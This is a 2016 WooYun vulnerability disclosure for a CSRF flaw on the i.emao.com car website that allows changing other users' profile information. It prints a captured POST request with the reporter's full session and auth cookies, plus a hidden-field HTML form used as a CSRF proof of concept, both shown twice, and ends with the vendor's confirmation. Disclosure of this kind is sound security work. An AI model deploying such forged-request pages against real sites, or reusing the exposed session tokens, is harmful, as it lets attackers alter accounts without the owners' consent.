当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167813

漏洞标题:一猫汽车网CSRF修改他人信息

相关厂商:北京一猫汽车科技有限公司

漏洞作者: 路人甲

提交时间:2016-01-07 13:46

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-09: 厂商已经确认,细节仅向厂商公开
2016-01-19: 细节向核心白帽子及相关领域专家公开
2016-01-29: 细节向普通白帽子公开
2016-02-08: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

一猫汽车网CSRF修改他人信息

详细说明:

QQ截图20160106143213.png


POST /homecp/user/dosetting HTTP/1.1
Host: i.emao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://i.emao.com/homecp/user/userinfo
Content-Length: 77
Cookie: Hm_lvt_c8553bf999297be4b7c3bf2ffec7c37f=1452005234,1452008006,1452055085,1452061634; _ga=GA1.2.816849709.1452005234; city_id=1; city_name=%E5%8C%97%E4%BA%AC; province_id=1; homePageCityId=1; homePageCityName=%E5%8C%97%E4%BA%AC; homePageCityPinYin=beijing; city_pinYin=beijing; _jzqa=1.3467950360625069000.1452006254.1452006254.1452055129.2; _jzqx=1.1452006254.1452055129.1.jzqsr=emao%2Ecom|jzqct=/.-; _jzqckmp=1; _qzja=1.1304430587.1452006253793.1452006253794.1452055129308.1452060788956.1452061074999.0.0.0.48.2; _qzjb=1.1452055129308.46.0.0.0; _qzjto=46.1.0; _jzqb=1.42.10.1452055129.1; sO3A_43cb_lastvisit=1452051783; sO3A_43cb_ulastactivity=1452059374%7C0; sO3A_43cb_lastact=1452061753%09index.php%09; mall_cityId=1; vacolide=m6uYoQ%3D%3D; sO3A_43cb_saltkey=Fd746Fh5; BAIDU_DUP_lcr=http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E4%B8%80%E7%8C%AB%E6%B1%BD%E8%BD%A6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; Hm_lpvt_c8553bf999297be4b7c3bf2ffec7c37f=1452061985; _gat=1; EMAOSSID=4120p570s890musk9rps3iljg0; EMUSS=n52emKCWng%3D%3D; EMUSE=pZ6graWl; sO3A_43cb_auth=96d6Ahb37eXVehfpHgOeRpCc5RccR37H%2BQcXRyPIHv1Dh%2BDqdPTpCBxmWFTDVcLmCfeotahQB9kWa9sVRyNxD%2BZge%2BQ
Connection: keep-alive
nickname=eeeeeeeeq&sex=1&year=&month=&day=&provinceid=&cityid=&areaid=&major=

<html>
  <body>
    <form action="http://i.emao.com/homecp/user/dosetting" method="POST">
      <input type="hidden" name="nickname" value="eeeeeeeeq" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="year" value="" />
      <input type="hidden" name="month" value="" />
      <input type="hidden" name="day" value="" />
      <input type="hidden" name="provinceid" value="" />
      <input type="hidden" name="cityid" value="" />
      <input type="hidden" name="areaid" value="" />
      <input type="hidden" name="major" value="" />
	  
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


{"code":0,"msg":"ok","data":{"uid":"117180","currentpage":"i.emao.com\/homecp\/user\/dosetting","loginuserid":"117180"}}

漏洞证明:

QQ截图20160106143213.png


POST /homecp/user/dosetting HTTP/1.1
Host: i.emao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://i.emao.com/homecp/user/userinfo
Content-Length: 77
Cookie: Hm_lvt_c8553bf999297be4b7c3bf2ffec7c37f=1452005234,1452008006,1452055085,1452061634; _ga=GA1.2.816849709.1452005234; city_id=1; city_name=%E5%8C%97%E4%BA%AC; province_id=1; homePageCityId=1; homePageCityName=%E5%8C%97%E4%BA%AC; homePageCityPinYin=beijing; city_pinYin=beijing; _jzqa=1.3467950360625069000.1452006254.1452006254.1452055129.2; _jzqx=1.1452006254.1452055129.1.jzqsr=emao%2Ecom|jzqct=/.-; _jzqckmp=1; _qzja=1.1304430587.1452006253793.1452006253794.1452055129308.1452060788956.1452061074999.0.0.0.48.2; _qzjb=1.1452055129308.46.0.0.0; _qzjto=46.1.0; _jzqb=1.42.10.1452055129.1; sO3A_43cb_lastvisit=1452051783; sO3A_43cb_ulastactivity=1452059374%7C0; sO3A_43cb_lastact=1452061753%09index.php%09; mall_cityId=1; vacolide=m6uYoQ%3D%3D; sO3A_43cb_saltkey=Fd746Fh5; BAIDU_DUP_lcr=http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E4%B8%80%E7%8C%AB%E6%B1%BD%E8%BD%A6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; Hm_lpvt_c8553bf999297be4b7c3bf2ffec7c37f=1452061985; _gat=1; EMAOSSID=4120p570s890musk9rps3iljg0; EMUSS=n52emKCWng%3D%3D; EMUSE=pZ6graWl; sO3A_43cb_auth=96d6Ahb37eXVehfpHgOeRpCc5RccR37H%2BQcXRyPIHv1Dh%2BDqdPTpCBxmWFTDVcLmCfeotahQB9kWa9sVRyNxD%2BZge%2BQ
Connection: keep-alive
nickname=eeeeeeeeq&sex=1&year=&month=&day=&provinceid=&cityid=&areaid=&major=

<html>
  <body>
    <form action="http://i.emao.com/homecp/user/dosetting" method="POST">
      <input type="hidden" name="nickname" value="eeeeeeeeq" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="year" value="" />
      <input type="hidden" name="month" value="" />
      <input type="hidden" name="day" value="" />
      <input type="hidden" name="provinceid" value="" />
      <input type="hidden" name="cityid" value="" />
      <input type="hidden" name="areaid" value="" />
      <input type="hidden" name="major" value="" />
	  
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


{"code":0,"msg":"ok","data":{"uid":"117180","currentpage":"i.emao.com\/homecp\/user\/dosetting","loginuserid":"117180"}}

修复方案:

这个你们比我更专业。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-09 21:32

厂商回复:

谢谢你们帮助我们发现了这么多问题,我们会好好感谢你们的!

最新状态:

暂无